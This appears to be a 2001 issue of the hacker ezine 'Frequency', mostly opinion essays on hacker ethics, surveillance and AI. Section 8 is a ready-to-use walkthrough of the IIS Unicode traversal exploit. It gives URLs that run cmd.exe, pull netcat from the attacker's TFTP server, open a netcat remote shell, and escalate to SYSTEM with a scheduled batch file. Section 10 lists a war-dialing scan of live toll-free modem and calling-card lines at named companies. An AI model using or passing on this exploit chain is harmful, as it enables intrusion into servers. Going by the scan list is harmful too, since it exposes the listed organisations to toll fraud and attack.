Frequency: Inside the Hacker Mind August, 2001 Freq12 COVER: www15.brinkster.com/screamerchaotix/verfreq12.gif (Disclaimer: Information contained in this ezine is for educational purposes only. Readers are urged to not use this information for illegal purposes.) 1. Introduction "The Path Less Taken" 2. Good and Evil 3. Where Have All The Hackers Gone? 4. Who Are The 203/501's? 5. Getting Started In Online Radio 6. The Darkside of A.I. 7. The True Danger of Surveillance 8. IIS 4.0/5.0 Abuses 9. The Free Email Scam 10. An Ireland 800 Scan 11. On The Inside - The SCSU VAX/VMS 12. Review "Hackers: Computer Outlaws" 13. Crosstalk 14. Closing Arguments 15. Crew 1. INTRODUCTION "THE PATH LESS TAKEN" Rebellion. What is it exactly? Does it allow for expression and the spread of knowledge, or does it represent something wrong with the society in which we exist? To answer the first question, I suppose it all depends on who you ask. Many teens will say rebellion is listening to the Smashing Pumpkins and wearing clothes from the Gap. Others may disagree, opting instead to rebel by not doing the things that stereotypes say they will. For example, some teens may "go against the system" by listening to loud music and staying out late…but aren't they doing exactly what society expects of them? But with that in mind, isn't a teen who acts depressed and separates his/herself from the daily expectations of teen life also doing exactly what's expected of them? As for the second question you must once again consider many options before you can arrive at a suitable answer. Rebellion in many ways expresses a dislike for the surrounding society, and perhaps this does show that something is wrong with how things are being run. Nonetheless, it's because of this distaste for the "normal way of life" that leads so many people to have breakthroughs when it comes to expressing themselves. Hackers are probably some of the most rebellious people on the planet. This isn't to say that they all dress the same way or share the same beliefs. It only means that their very nature goes against the typical ideals of our world. After all, the US claims that knowledge is power…and yet will throw someone away for years if they figure out how to make a certain tone. In their quest to figure things out, hackers often step on a lot of toes. And those toes usually belong to the people in high places, the "moneymakers" if you will. These people dictate the rules of how we live, and if you find this hard to believe take a look at Jack Valenti, president of the MPAA. With a little backing from this man, digital television is moving closer and closer to our living rooms. And with that, the power to control what we watch, when we watch, and how we watch our favorite television shows and films. He claims encrypted digital broadcasts are necessary because "digital television will provide a picture so clear that even an amateur can make a bootleg copy." Sorry Jack, but amateurs are able to do that now using a really cool invention known as a VCR. Do you honestly believe your whole economy will crumble because people may be able to make a copy of a digital television show? If this were the case…you wouldn't be in business right now. Sure enough hackers will break the encryption. Why, you ask? Because of their desire to find loopholes in the way the world operates. Already I, and others like me, are getting all sorts of ideas about what can be done with encrypted signals going through the lines and air. Can you break the encryption to make as many copies as you want? Sounds like fun to me…but no, I don't plan on opening up a pirate video business. After all, I could do that right now if I wanted to…but I don't because it's illegal. So here we see how rebelling can lead to the spread of information and knowledge as well as showing the world what a corrupt system is out there. Trust me, Smashing Pumpkins and Gap clothing may be your thing…but you're only doing what they want you to. If you want to rebel, do so by learning what "they" don't want you to know. Remember kids, knowledge is power.... Before we get on with the ezine, I think we should mention that there has been a slight change this month. We're no longer going to have an article "due date". From now on, any article sent in will have a chance for any issue. We've seen far too many people get articles in before the 8th only to find out the ezine is full. With the new system, we'll put articles that are accepted into the ezine in a first come first serve basis. So remember, if you submit an article in January, it may be posted in April issue. But we'll do our best to notify you ahead of time. Also different this month is the release date. We will now be able to release the ezine when it's completed, without having the pressure of releasing it before it's actually finished or having to wait a week until the 8th finally arrives. Rest assured, things will remain more or less the same, and of course send those articles and cover submissions into articles@hackermind.net. And now, the moment you've all be waiting for, welcome to issue 12 of Frequency. -screamer 2. GOOD AND EVIL: by Zed I can hear you all yelling at me right now, how the hell can I say that hackers are bad in a hacker ezine?! Well my poor, misguided friend, you missed the whole "hackers are good" part of the title…shame on you. But please keep in mind, this is not meant to be the definitive one size fits all guide to why we need, or don't need, hackers. I'm only writing it to vent a few of the frustrations that have been bubbling over in my brain. To make you happy, I'll start off with why hackers are good. By good I mean good to everyday society as a whole, which includes big business and the little people as well. I think it goes without saying that anyone who enters a computer and does harm is breaking the law, and not helping anyone, so try to remember that as you read. Good If nothing else, they show us the truth hidden within the world around us. Those hackers that don't have a malicious bone in their bodies, the ones who are truly out there because they enjoy being creative, they are the ones that can reveal things the average computer user would have never seen. Perhaps because the average user doesn't give a rats ass about how their machine does what it does, all they care about is getting their work done on time so they can go home. Alright, you're saying, how the hell do hackers show people how things really work? I'm dying to know! And don't give me that "they taught people about the touch tone fee" bullshit, I've heard it before. Well first off you're very narrow minded. Hackers were the ones that showed people how they were being ripped off by the touch tone fee. I'm sure others had a hand in it as well, but hackers certainly played a large role in that revelation. Still, I'll give you a few more examples just to keep you happy. You know all those computers that your business uses? Or the Linux you use on your home machine? All those things were created by, you guessed it, hackers. "No they weren't," you're yelling, "They were created by computer professionals who were master programmers!" Ah, but you see that's the same thing in most cases. To be a "master programmer" takes a desire to learn the art of programming. Few programming artists got the way they are because it was the only thing they could do to get a job, they did it because they loved it. Guess what? That's a hacker. So here we have UNIX and Linux, created by and improved upon by hackers for use by the general public. I don't know about you, but that sounds like a major contribution to me. Ok, I can hear you saying something else now (damn you're loud). You're telling me that hackers aren't always professional programmers, sometimes they're just kids with readily available programs. Admittedly, this is where the definition gets a little hazy. Should we consider a kid using a program as a hacker? Many would say no, because he lacks the desire and/or knowledge to create exploits on his own. He doesn't have the vision for finding security holes and using them to his advantage, no all he can do is use someone else's program. But what if he does this to get a bit more understanding of how machines work? Suppose he does this to gain access to a system that would otherwise be off limits, just so he could compile some C programs. He's not doing any damage, and is in fact educating himself. So here we see that the only thing distinguishing a real hacker from a person claiming to be one is an inner desire. Does the person actually love the technology, and love learning about it? Or does this person just want to do something cool to impress their friends and make themselves feel like a hacker? The answer is up to you, although I urge you to consider each individual circumstance before reaching a conclusion. Now with this fresh on our minds, let's ask ourselves why a hacker that enjoys penetrating systems that don't belong to him could possibly be an asset to society. For one thing, they're fantastic at showing people where their security holes lie…and if we assume everyone wants to know when they're open for attack, we can also assume they'd like to be informed of this possibility. So here we see a company (or individual) that is vulnerable to a particular form of electronic attack. Along comes Johnny Hacker who uses an exploit found on securityfocus.com and gains root access to the system. Of course the "target" is pissed off, who wouldn't be? But if Johnny didn't do anything, where's the harm? The only thing that's happened is that the target was made aware of what was going on! Ok, what if Johnny didn't tell them and kept the information to himself, resulting in the target never learning from its mistakes? At the very least they'll realize that they had a system penetration. Perhaps it's time to upgrade your security, or maybe even your security administrator. Again…no one gets hurt, nothing is damaged, the only thing that happens is the host gets a little security advice for free. Evil "If I don't want your help, don't give it to me." It's a common phrase uttered by people who have had a hacker gain access to their system. And hey, aren't they right? If I don't want you coming into my computer, for whatever reason, shouldn't I have the right to say no? If I don't want you going into my (insert your analogy of choice here) then I can keep you out, so why should my computer be any different? You're not helping me by going around my private files, whether you read them or not. You claim you have no interest in them, but how do I know what your interests are? From where I am, you look like any other intruder on my network. If you're only there because you're curious, and you have a heart of gold, then no I won't be as upset. But let's keep in mind that there's no way for me to know that! Sadly this is a fact. There is no way for someone to know who is going to educate themselves, and who is going to erase sensitive files until after the fact. Shouldn't these sysadmins have the law on their side? After all, you're the one going the extra mile to get in. "Hackers lie, cheat, and steal." Well first off, people lie, cheat, and steal…whether they're hackers or not remains to be seen. But with that said, yes, we must admit that some hackers do use their abilities for inappropriate reasons. Would it be logical in the least to suggest that just because someone is a computer genius they have no desire to commit a crime? No, of course not. So by that rational, someone who has their email read by a hacker that got into their machine would be justifiably upset with the culture as a whole. There's probably no real way to explain to this person that it was their horrible security that was to blame, but this brings me to my next argument. Blaming the victim. If a hacker gets through my security, I'm the victim. You can't blame me for not being smart enough to recognize such a miniscule security flaw. I've done a fantastic job of securing my site, but some hacker managed to get lucky and gain access…why are you blaming me? This is true in many situations, particularly those where hackers are up in arms about the pathetic security a system has. Do we as hackers have a right to decide how much security someone has? If they want to keep themselves wide open for attack isn't that their right? Conclusion All in all we must remember that hackers (as a whole) are not saints nor devils. They're usually people who just want to play around with whatever type of technology they can get their hands on. As long as every computer system out there is different, hackers will always want to explore new machines to see what can be done. If you can hold your lunch, it's almost like a young boy and girl playing doctor. Sure the parents wouldn't approve, but it's really just innocent experimentation. The only anger comes from the parents who "don't want to see such activity." Much like the system administrators who don't want to be shown up by people in the general public. We know there are dozens, if not hundreds of replies to the statements posted earlier in this article. Sadly, there's no way to touch upon all of them, so just remember they do exist. For every reason why a hacker should try to get into someone's computer, there's a comeback as to why he shouldn't. Perhaps I will post a follow up to this someday, because I'm sure people will come up with new reasons why hackers are good and bad as long as hackers are around…and let's face it, they're not going anywhere. 3. WHERE HAVE ALL THE HACKERS GONE? By: EMPulse I hear it all the time and it never stops pissing me off! "The web is lame! Real hacking doesn't exist anymore! IRC is stupid, BBS's rule!!!" Shit like that drives me insane, especially coming from someone no older than myself. Sure, back in the 70's and 80's there was a lot going on in the hacker world, but is it necessary to put down the things going on today just because you can't keep up with the changing technology? And yes, that is the point of my article…I'm making the bold statement that hackers of the past want things handed to them. They claim that real hacking was done with slow modems and information was found on BBS's that weren't cluttered with spam…but I say it's because they don't know the first thing about a buffer overflow. Or if they do, only because they sold out to some security firm that's using them to hunt down hackers. It's as though they're saying if you're just starting out, you're not a hacker…because if you're just getting into computers now then you missed the wagon so to speak. You're out of luck, hackers are no more. Of course when these sell outs get their nice jobs as network admins, hackers are more prevalent and dangerous than ever! Suddenly hackers are alive and well, and stalking all those evil corporations out there. Of course the only people that can stop them are those ex-hackers who have now realized that it's a lot better on the "good side of the law." In other words, it's a lot better to be paid…no matter what you have to do. So what was that statement I made about hackers of yesteryear wanting things handed to them? From what I can tell, most people gave up hacking when it became to difficult or dangerous. Yes that's right, when firewalls and anomaly detection systems came into place they were the first ones to bug out! They claim it's because the net fell to shit…well I'm sorry fellas, the internet is still alive and well. Yes there is a lot of bullshit, but I'm sure if you traveled back in time to your little utopian society you would see that not all was well back then. You mean to say there weren't people posting bullshit on your perfect little boards? You mean there was no arguing, no junk mail, and no conflicts of interest back then? I seriously doubt it. No, the reason why you stopped being a hacker was because you could no longer red box and didn't want to bother learning more about digital telephony…that shit's not fun, you say, you want the olden days to live forever. Well I'm sorry guys, technology is always going to evolve. And while a whole lot of hackers out there really no nothing (except that they want the title "hacker") and they know who they are, there are still a lot of geniuses who can do amazing things. And there are still people who love to play around with these new advances to figure out how they work. You may say that they're only interested in committing crimes, but let me ask you this…was everyone back in your day a total saint? You can honestly say that no one made a free phone call because, well, it was free? Please. To sum things up, not every hacker from back in the day has changed this way. I'm well aware of hackers that were amazing back then, and are amazing now. Not all have turned into "hacker trackers." And not all are complaining about hacking no longer existing. But for those that are I wanted people to keep a few things in mind. Back in the 80's passwords were one character long…if they existed at all. I'm sure just learning about them was a challenge in and of itself, but the next time you hear some old school hacker bitching about things not being fun anymore, be sure to ask him if he means fun or easy. 4. WHO ARE THE 203/501'S?: by Da Peng (translated by Screamer) Legion of Doom, Masters of Deception, Cult of the Dead Cow…all famous hacker groups. But recently it seems that a new group has arisen, one unlike any other. In a time when people thought the good old days of hacker groups were gone, along comes the 203/501's. Perhaps you've heard of them, perhaps not. They're definitely not your typical hacker group, far from it actually. But hopefully this article will serve as a brief introduction to a very quiet group of hackers. To be honest, no one can say how many members belong to the 203/501's (2/5's for short). As is the case with most hacker groups, people always seem to be joining and leaving all the time, but what remains constant is what they're about. In a world of newbies and lamers doing nothing but running the same exploits over and over, the 2/5's actually enjoy everything they do. Programming, scanning, phone phreaking, and social engineering are all in a days work. New members are brought in by what they want, not what they know, but if you are still learning UNIX you'd better not apply. Sure, you're probably telling all your friends right now that you're a member, but guess what? True members know who they are by a codeword, and until you're in you can't get it. So while you may be able to impress your buds, just make sure they're not already in…otherwise you'll wind up embarrassing yourself. What have they done? Why haven't I heard of them? Quite frankly, the 2/5's are not anti-social, nor do they wish to remain anonymous. Unfortunately, due to the paranoia in the world today they're forced to. Oh sure you'll get a few members who have no problem announcing what they belong to, I'm one of them, and extremely proud of it. It's a hacker group that really lets you explore technology the way you want to. You're welcome to be an individual and do things your own way, in fact, that's encouraged! There's no leader, and that means no followers. People who make it in are welcome to do whatever they like, as long as they share their knowledge with the rest of the group. Occasionally this information (typically security related) is spread across the internet, although seldom do you see the name 203/501's attached to it. So how do you get in? Well I'm afraid it's not that easy. You see, the 2/5's are a tight knit group, and as such it takes them a while to come to trust an outsider with all their best tricks. In typical Matrix-fashion, if you want to join they'll find you. But don't expect to be part of any huge hacker wars, the 2/5's strive to be the protectors of telecommunications. It's what they love. The internet and phone networks fascinate them to no end, and as hackers they do their best to protect it from those that may harm that system. Do they go where they're not supposed to? Yes, on occasion such activity is necessary. But you must keep in mind their motivation. They mean no harm. They're simply young hackers having fun with the technological world around them, and showing people that systems can be broken. -[203|501]- 5. GETTING STARTED IN ONLINE RADIO by: Screamer Chaotix A lot of you have emailed me, IRCed me, or just downright begged me for advice on how to get started in online radio…so here it is, my advice to you. The first you thing you need to do is find someone that will host your show, a site such as www.live365.com will do nicely…although you must keep in mind the number of advertisements they're now running may turn away some of your listeners. Nonetheless, freedom of speech is not a problem so go ahead and insult all the ads. The most important thing to remember is that there are strict rules and obligations that you must follow. They suck, I'll be the first to admit it (and break them) but they do exist. Be sure to read all the fine print of the host you choose. Next up, you'll need to figure out what kind of show you want to do. Keep in mind this is the most important aspect of the whole thing…if you pick something you don't enjoy talking about, you won't be a happy camper. Then again, don't let yourself become a victim of "false inspirations." These can occur when you think about something you enjoy, perhaps Quake games, and you get all excited about making a show dedicated to that topic. But you do this without ever thinking it through. You don't plan for the future, you don't consider the alternatives, and most importantly you don't even ask yourself if it's possible. The best thing to do is to pick a topic and then think about it for a week or so. If after all that time you've decided that that's what you want to do, then go right ahead. Just don't go rushing into a show that you're never going to work on. Perhaps the most important aspect of choosing a topic is longevity. How long can this topic last? Is it expandable? Can you branch off onto other topics that may be of interest? If you're making a show about Quake, you need to think about the future…what if there is no Quake IV? Will your show be able to last a year? Five years? Ten years? It's seriously doubtful that it will, so try to focus your attention on a more general topic…such as computer games. This way you can talk about whatever you like, without having to worry about a particular series dying off. The same could be said about any topic. The more general it is, the more possibilities there are. What's the best show to make? This is up to you, but generally it's best to not copy someone else. Hackermind was inspired by Off the Hook, but the things we do and talk about are done because Off the Hook can't do it all, not because we have to copy their every move. If you listen to our show and decide you want to make the same type of thing that's fine, just be sure to be original in someway. And remember, make sure that hearing our show doesn't give you a false inspiration…be sure to think long and hard before making a decision. The one thing that gets more comments than anything else is the subject of "branching off." Can a hacker show talk about phone phreaks? Can a hacker show talk about computer games, world events, or just everyday things? The answer is yes, because you can do whatever you like. No one is paying to hear your show, so go ahead and make it the way you think it should be made. Of course you must keep in mind that not everyone will enjoy hearing about music reviews on what's supposed to be a hacker show…so try to stay focused most of the time, or find another topic. Can you except phone calls? This is the next most talked about aspect of online radio. People are constantly wanting to know when Hackermind will be able to take calls, but due to technical limitations this is not possible. If you're willing to either set up an entirely new number, or (if you're really out of it) use your existing home phone, there are a few things you should remember. Not everyone will play along by calling in with a question. Odds are 9 out of 10 people will call in just so they can burp into the phone or talk shit about you, so you MUST be prepared for that type of incompetence. Also, when you're not broadcasting to a large audience people seldom see the necessity to call in, so perhaps you should just create a channel on your favorite IRC channel for them to join. While doing a live show, you can accept comments or questions from there. And finally, how do you make it through an entire show? The easiest answer to this is to plan ahead. Many people wait until the last minute to do things, but this is simply not acceptable when you have such a big responsibility. Think up things you want to talk about long ahead of time, and be sure to have backups incase something spoils your original plans. Remember, if you're doing a live show there are no cuts, and there are no safety nets. It's do or die. And lastly, do a few practice shows by just recording them into MP3s. Whether or not you ever air them is up to you, just try and see if you can actually fill up your allotted time. I hope to hear more of you on the net. Remember, the internet is the greatest form of free speech there is, so be sure to use it! We all have ways of hearing the same Top 40 songs on the radio, use this as a way of really expressing yourself. I won't tell you what to say, just as long as you say it loud and proud. -screamer Page 2 -->6. THE DARKSIDE OF A.I.: by The Blue Giant OK, I'm going to be brutally honest here; advanced forms of artificial intelligence scare the hell out of me. I just find something very unnerving about creating something that can not only perform certain tasks better than most humans, but that can also think for itself on other matters as well....a philosophic robot anyone? The implications of having something like this are enormous. No one really knows what would happen, hence all of the hundreds of sci-fi books that are all centered around us creating robots that can think for themselves, survive on their own, and in the weirdest part of all, can feel, and have their own emotions. Anyone that's ever read Orson Scott Card is familiar with all of these concepts in Jane,a being that exists throughout the power lines, and isn't supposed to exist. Of course, in these books Jane becomes Enders only friend and helps him countless times. In some ways that thought is more disturbing than these AI robots going power crazy and enslaving the human race., not to say that that's not a bad thing though, because it definitely is. Now that I've gone through a few doomsday possibilities, let's take a step back and look at the facts. Artificial Intelligence as talked about in those science fiction books is early impossible, and will most likely stay that way long past we're gone, if ever. Sure, the scientist and engineers working on AI projects will tell you that they already have something that is ' Intelligent and can solve problems without being told the answer, or how to solve it.' Needless to say, that's a far stretch from the point where robots are taking everyone's jobs ad making humans extinct. The two most 'intelligent' robots out there right now are probably the chess robot, and the one NASA is working on. Sorry for being vague there, but I don't remember what these are being called. Now, as some of you may remember, the previous world chess champion lost a game, to a computer. Of course, this proves nothing, because it was a very long game, and everything makes mistakes. It does, or should, at least, dispel peoples fears about advances in AI replacing humans. Then there's NASA's robot. This is being designed to be, naturally, an astronaut. Apparently it will be able to fly shuttles and do whatever it is that astronauts do. The AI comes in whenever something goes wrong, which may happen quite often in space. The robot will be able to rationalize what the problem is, and how to solve it, all without being told, or having the scenario programmed into it. That's nifty. Now on to what I perceive as the big flaw in these 'thinking robots.' They're specialized. As long as AI continues to be used in robots only designed for one task, there's absolutely no need to worry about losing your job to a machine, and there probably never will be. Now on to crush the idea in these sci-fi stories. None of these machines have feelings either. It's al fine and dandy to have a genius, honest, and incredibly diplomatic robot, but if that robot has no feelings, it's not very likely to run for president ,is it? The human brain has yet to be understood, and even when it is all mapped out, that hardly means that they'll be able to replicate the thought process, and emotions, even the base ones like anger and fear. Simply because these emotions are far from simple, and some have no rational explanation, and probably never will. Sorry Jane. In the beginning of this I stated that advanced artificial intelligence scares me, and it does. The fact that it's an understatement to even say that it's highly unlikely that we'll ever create that does damper the fear though...a lot. The idea is fascinating, some of the breakthroughs have been incredible, but at the moment that's all they are, ideas, someday will robots be waiting on me at McDonalds...maybe. I just wonder if they'll get mad at me when I sit at a table without ordering first. 7. THE TRUE DANGER OF SURVEILLANCE: by Lone Ranger I turn on a scanner, I hear a phone call. I aim a camera out the window, I see my neighbor in her pool. I look through a telescope, I see a girl walking down the street. And yet, when I see a camera on the street I freak out. I cry injustice and demand that things be changed, after all this isn't 1984 we're living in. But now I'm forced into a conflict, is my monitoring of the world around me any less inappropriate than the government looking down at me? Let's examine. First off no wants to live in an oppressive society, and while the United States may be far from that when compared to other parts of the world no one can deny the plain honest truth. Big Brother scares us. No not the show, although that's scary too, I'm referring to the idea that Uncle Sam is watching every move we make. Sure we start with cameras, but then we move onto cameras that can monitor your face and see if you're a wanted criminal! Ok, ok, like that'll ever happen! *sarcasm* With this inept fear of a world of thought crimes and of people being accountable for every move they make it's no wonder that we shudder at the idea of the all powerful government looking down at us, the wee little people. Keeping this mentality, does my camera/cassette recorder, or police scanner really seem all that threatening? Perhaps the answer to that question simply leads to another puzzle, why do some people get to snoop while others don't? Why is it legal for a police officer to record every move you make, but should you record what he says you'll be arrested? What we must remember is that surveillance in itself is not a bad thing. People have a right to watch out for their property, keep an eye on visitors, keep records of spoken events, and watch their neighborhoods from their homes. Seeing other people should not be considered unlawful, otherwise our eyes would instruments of crime. We need to see past the idea of surveillance being a "bad thing" and remember what the real problem is, and that's oppression. Few people will argue that a kid recording his neighbors or a man listening to a scanner poses that big of a threat, but when they see cameras (put in place by the US Government) scanning huge crowds of people like something straight out of 1984 you must worry. Moving away from cameras, the same logic could be applied to systems such as Carnivore. While not exactly as dangerous as we first suspected, the system in itself troubled people by seemingly being able to read anyone's email. While the idea of Jimmy Hacker down the street sneaking a peek at your mail may sound bad, I ask you to imagine the government doing the exact same thing. This will probably give you some perspective on where the real problem lies. Bottom line, the next time you walk down the street and see a camera looking down at you, don't freak out about surveillance. I'm sure you'll give it the finger, and that's fine, but try to remember that it's oppression we're fighting here…not cameras and other forms of equipment. To ban these things would go against everything hackers stand for. We say that information needs to be readily available, and that it can be used for both bad and good. The same applies to this topic, albeit in a slightly different way. The problem here isn't how you use it, it's WHO is using it. That, is extremely important to remember. 8. IIS 4.0/5.0 ABUSES: by Unreal For the past two months, there has been a nasty little IIS 4.0/5.0 vulnerability hanging around. Unpatched, it will allow anyone with a web browser to execute arbitrary commands on the vulnerable server as the IUSR_machinename user. Now, if you subscribe to Bugtraq, or have been actually awake for the past two months, you've most likely heard of this hole. To refresh some memories, this is a design flaw in how IIS 4.0 & 5.0 handles CGI requests. I'm not going to get into the nitty-gritty details, as that is not the topic of my post. This post is about how it is possible to use this vulnerability to gain privileges on the target system, leading to a compromise with SYSTEM privileges (Administrator equivalent). Now before I continue, I'd like to take a second to cover my ass just in case anyone has any intentions to use this information to do something illegal. This next part of the post is for educational purposes only, so don't come after me if you do something illegal and get busted. Got it? Good. On with the post. Now, if you're familiar with NT/2000 security, you'll know that the IUSR_machinename account is pretty damn close to nothing in the great scheme of things. To be able to do anything serious with an NT/2000 system, you'll need Administrator, or Administrator equivalent access (that is, SYSTEM). Well, using this IIS exploit, how would this be possible? Well kiddies, it's not as hard as you might expect. For the next part of the description, I'll assume that you have a TFTP server installed on your box (free from solarwinds.net), and a copy of netcat from l0pht.com. Using netcat, we can have a command shell piped back to us using the "-e" switch. Read the netcat docs for more details, but for now, we'll use the "nc -L -d -e cmd.exe -p 5000" command. This starts netcat to listen on the target on port 5000, in stealth mode, and will pipe back cmd.exe to whoever connects to it. Here's where the privilege escalation part comes in: When you connect to the netcat listener, you are connected as the IUSR_machinename. However, using a simple startup job or trojaned batch file, you will gain Administrator or SYSTEM quite easily. Here's an example batch file that you could put in the startup directory: @Echo off AT 12P /e:1 nc.exe -L -d -e cmd.exe -p 5000 As you can guess, when the Administrator logs in, the script will start up, and our netcat listener will be started up at 12:00 PM everyday. Here's the good part: Since the "AT" command is running under SYSTEM permissions, we'll be able to connect to target system as an Administrator equivalent. So how do we get an interactive command shell through a browser? Well, I'll walk you through it. Remember, just because I point this way out doesn't mean that it's the only way...be creative! In your browser, type: http:///scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ If the server is vulnerable, it will cough up a listing of the root of %systemdrive% (in this example, it's C:\). So now we know we can execute binaries since we used "dir." Now what? Let's name a few more binaries: tracert, netstat, tftp. Wait a minute...what's this? TFTP? Ah, the venerable chink in the armor. Let's plug that into our browser along with our exploit: http:///scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+tftp+-i++GET+\nc.exe+\nc.exe As you can see, we're going to transfer our program netcat (nc.exe) to the target's root directory (which is by default, world-writable). Well alright, nc.exe is on the server as c:\nc.exe. Now what? Remember how I said we could execute binaries? Here we go. Using that "nc -L -d -e cmd.exe -p 5000" syntax I mentioned earlier, we could easily start that listener to pipe us back a remote command shell. In your browser, type: http:///scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+nc. exe+-L+-d+-e+cmd.exe+-p+5000 Bingo. Connect to your newly-made listener at port 5000 on the remote machine, and you will soon have yourself full Administrator or SYSTEM access (pending that simple privilege escalation exploit). Enjoy. 9. THE FREE EMAIL SCAM: by Nutrition-Facts hotmail.com = government's snitches/bitches I have learned this from personal experience. I'll try to make a very long story very short. One day I have sent a e-mail to my friend that contained content using keywords like "kill, hack, choke, murder, drugs, weed, etc". I have put my name in that subject and on my hotmail profile. Hotmail reported that e-mail to the local police, they must have traced my ip and got the city name and since my real full name was on the subject, it made it very easy, and since I said I went to some schools in the area, it made it more easy. A cop came to my moms store and showed that e-mail to her, then the school office called and asked me to go in for questioning. They questioned me about every thing from that e-mail. It had stuff to do with what I said, and what I did with and at school, a lot with computers. The assistant principal said the letter was found by some environmentalist in the woods. That was bullshit. The same cop who went to my moms store came over my house in a couple days and asked the same questions. He said the office had no clue how the letter was found. He said hotmail reported it, then he did some work getting stuff on me asking questions and more. He said some servers have filters and some more stuff like that. What is true is that some free e-mail servers do use filter/scanner type programs. These look for illegal content, then report it to the admin, the admin looks at it and if it can be reported and be a useful case he sends it to the cops. That is very true. I asked a hotmail admin about it and he sent me a couple chapters on the terms and conditions. I could have got arrested if the people who worked at schools could setup a good firewall and logging tools all because ONE message. If the message was just about non school related stuff I would have just told the assistant principal to fuck off. If you get a hotmail account I hope you remember to never put real names and places or people in your registered name, city, subject, in the message, and any more. This post should be spread. Oh yeah, here's some free e-mail accounts that do not snitch on you, I have tested them in the past :) louish.com hackersunderground.com both owned by Clint Decker a person who is not a snitch ------- That is why free e-mail accounts are a scam most of them at least. They read what you read and write. 10. AN IRELAND 800 SCAN: by Gringo Blanka 1800 free phone 554 prefix (aka 1800+554+###) 996 - kodak germany(ger/v) 995 - no pickup 994 - no pickup 991 - Broud Vision suport center(internet aplication suport) - English voice 981 - Morgen Stanly Bank - English voice 971 - Clinical Research facility - German voice 968 - modem/fax 952 - a world wide hotel recomender company 925 - Morgen Stanly Bank - German voice 920 - Microsoft Germany 918 - ??? German company 914 - a hotel recomender company - English voice 908 - modem/fax 903 - German Telecom company(there's only one in Germany) 902 - " 899 - Electronic Data Systems - USA 892 - modem 891 - AAA(America Automotive Assosiation) 888 - JDA Solutions(a computer company) - USA 887 - personal answering machine(can't make out the name) - USA 886 - extention 5045(answering machine) - USA 881 - modem/fax 880 - modem/fax 877 - Golbal's voice mail box - USA 875 - modem/fax 874 - Fred Prire's seminares(work orintation) - USA 873 - Advertising agentansy - USA 869 - "Enter code"(9 digits) - USA 865 - Personal answering machine - USA 859 - Las Vegas "The Vienene" hotel(on the strip) - USA 858 - modem/fax 855 - Photomask Co. 853 - modem/fax 851 - Work Station Direct - USA 850 - Links Universal number - USA 841 - All curcuts busy - USA 840 - " 839 - " 838 - Comp Health(phisition recution) - USA 837 - All curcuts busy - USA 836 - Some company - USA 834 - Personal answering machine - USA 832 - Greich Accosiots - USA 831 - Prolife(christian orginisation) - USA 823 - ? 819 - Corning Optical Fibare - USA 818 - Pulmary Data servise - USA 817 - modem/fax 813 - Kenco Constructions - USA 810 - modem/fax 808 - enter code(9 digits) enter "*1" and you get a Spanish voice(?) enter "*2" and you get a Asian voice enter "*3" and you get a Spanish voice(?) enter "*4" and you get beeps, then it hangs up enter "*5" and you get a German voice enter "*6" and you get a Russian voice(?) enter "*7" and you get a Spainish voice(?) enter "*8" and you get a Asian voice(?) enter "*9" and you get a Asian voice(?) enter "*0" and you get a American voice(?) 747 - modem/fax 697 - Job Searcher company - German voice 669 - No answer 622 - No answer 616 - Bank Nordea - German voice 602 - 'Welcome to Premier Call Sevices' - German voice 601 - No answer 596 - modem/fax 592 - A German company 591 - modem/fax 577 - A Austrailian company 576 - Some telco - Austrialian voice 561 - 'Please enter your calling card number' - USA 560 - " 556 - Leo Phamisutical bind test line("Enter pin code") - English voice 543 - Weird noise(doesn't respond to any key presses) 537 - No answer 529 - No answer 528 - Private number - German man 527 - Some German office 525 - Mobile card phone service(calling card) - German voice 524 - A menu system in German(i can't understand it) 523 - " 519 - Some German company 518 - modem/fax 517 - Some German company 509 - Beeps once, then silence, and only responds to '#' If you press '*' two times then you get a dial tone, but i can't use it! After a while is says 'To reach costomer service dial 822532310' 507 - IBM ordering center - English voice 505 - modem/fax 501 - No answer 499 - 'No greeting has been recorded. Tranfering to an atendant' - USA 498 - No answer 497 - modem/fax 495 - modem/fax 494 - modem/fax 493 - modem/fax 491 - modem/fax 485 - modem/fax 478 - modem/fax 467 - American assosiation of blood banks(!) - USA 466 - Ace hardware housing - USA 464 - Personal answering machine 463 - Future, an American company(they distribute electical components) - USA 457 - 'Enter card number and pin' - USA 455 - modem/fax 448 - Quinthouse Transnational quality assuarance hotline - USA 447 - Citizens banking cooperation 445 - 'Enter 4 digit study code'(ICPI) - USA 441 - Data stream - USA 437 - Mental health conseling - USA 433 - modem/fax 431 - modem/fax 422 - modem/fax 421 - City bank - Multinatonial 420 - Information suport center 419 - modem/fax 417 - Kinsame investigation - USA 411 - modem/fax 410 - World com worldwide customer care - USA 407 - No answer 404 - wierd 402 - world com wireless - USA 400 - No answer 399 - TV making factory - Denmark 398 - No answer 396 - TV making factory - Denmark 395 - " 394 - " 393 - " 392 - " 391 - "(weird) 390 - 'You have dialed 1520233333. The charge for this call is BC'(eircom guy's voice) - Eire 351 - Musolf car transport service - German voice 194 - modem/fax 148 - modem/fax 122 - No answer 121 - 'New number is 0616361111' 119 - modem/fax 117 - Swiss Com('Enter one number, then press the '#' button') 115 - No answer 114 - modem/fax 103 - Dresent bank - Luxumberg 099 - AFA auto mobiles - German voice 097 - AFL cable harneses producer - Hungry(the country, not the urge) 095 - Private number(to a house) - German man 093 - " 091 - modem/fax 090 - No answer 089 - No answer 083 - Client Logic('Enter 5 digit extention') - USA 075 - American Express 074 - City bank - USA 073 - Audit company(IRS?) - USA 068 - Calling Card - USA 066 - ? 064 - Enterprise solution line(car rentor) - USA 056 - modem/fax 055 - Mega Capatial investment company - USA 053 - modem/fax 048 - Morgen bank - USA 045 - modem/fax 044 - 'Please enter your mail box number and pin' - USA 035 - Cellos vmb system - USA 031 - Western Process(?) - USA 030 - Brokerage firm - USA 029 - Helix(manufacturer of cryogenic pumps) - USA 025 - Cardinal conference - USA 024 - Bakster Video Conferencing USA 020 - modem 161\1000 valad numbers! Scanned by gringo_blanka@yahoo.com I have set out the most important information in order for ease of use: modems: 968 908 892 881 880 875 858 817 810 747 596 591 518 505 497 495 494 493 491 485 478 455 433 431 422 419 411 194 148 119 114 091 056 053 045 020 36 modems companys: 996 - Kodak germenay - Germany 991 - Broud Vision suport center - England 981 - Morgen Stanly(bank) - England 971 - Clinical Research - Germany 952 - World Wide Hotel recomender 920 - Microsoft Germany 918 - Nico Materals Europe - Germany 914 - Hotel recomender - England 899 - Electronic Data Systems - USA 891 - American Automotive Association - USA 888 - JDA solutions - USA 877 - Golbal - USA 874 - 